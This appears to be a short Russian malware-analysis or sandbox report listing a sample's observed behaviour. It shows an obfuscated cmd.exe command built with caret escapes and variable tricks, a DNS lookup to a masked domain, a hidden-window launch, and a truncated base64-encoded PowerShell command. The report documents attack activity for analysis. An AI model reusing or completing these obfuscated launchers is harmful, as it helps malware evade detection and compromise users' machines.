Техническая информация
- '<SYSTEM32>\cmd.exe' YXbwFjhC kSKbTtzWEOLGqJjllWljdQp SdSJCfIjddOkQf & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %CjIjkzwSjSMTzLR%=GBUdAQjNCjkb&&set %QklkiSo%=p&&set %fPEmvIMwU%=o^...
- DNS ASK fq###d8qwd4.com
- '<SYSTEM32>\cmd.exe' YXbwFjhC kSKbTtzWEOLGqJjllWljdQp SdSJCfIjddOkQf & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %CjIjkzwSjSMTzLR%=GBUdAQjNCjkb&&set %QklkiSo%=p&&set %fPEmvIMwU%=o^...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JgAgACgAIAAkAHMAaABFAEwATABJAEQAWwAxAF0AKwAkAHMASABFAGwAbABJAEQAWwAxADMAXQArACcAWAAnACkAIAAoAG4ARQBXAC0AbwBiAGoAZQBjAHQAIABJAG8ALgBzAHQAUgBFAEEAbQByAEUAYQBEAEUAUgAoACAAKABuAEUAVwAtAG8AYgBqAG...